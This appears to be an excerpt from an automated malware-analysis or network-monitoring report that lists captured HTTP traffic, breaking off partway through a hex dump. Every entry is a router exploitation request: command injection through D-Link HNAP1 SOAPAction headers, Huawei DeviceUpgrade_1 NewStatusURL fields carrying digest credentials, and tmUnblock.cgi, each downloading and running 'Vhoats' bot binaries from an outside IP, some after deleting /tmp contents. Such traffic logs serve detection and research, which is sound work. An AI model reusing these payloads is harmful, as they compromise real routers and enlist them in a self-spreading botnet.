Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://2.59.254.79/htmlbins/Vhoats.mips && chmod +x Vhoats.mips;./Vhoats.mips hnap.selfrep`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf Vhoats.mpsl; wget http://2.59.254.79/htmlbins/Vhoats.mpsl; chmod 777 *; ./Vhoats.mpsl asus.selfreData Raw: Data Ascii: |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 2.59.254.79 -l /tmp/.vagner -r /htmlbins/Vhoats.mips; /bin/busybox chmod 777 * /tmp/.vagner; /tmp/.vagner huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 2e 35 39 2e 32 35 34 2e 37 39 20 2d 6c 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 2d 72 20 2f 68 74 6d 6c 62 69 6e 73 2f 56 68 6f 61 74 73 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 3b 20 2f 74 6d 70 2f 2e 76 61 67 6e 65 72 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 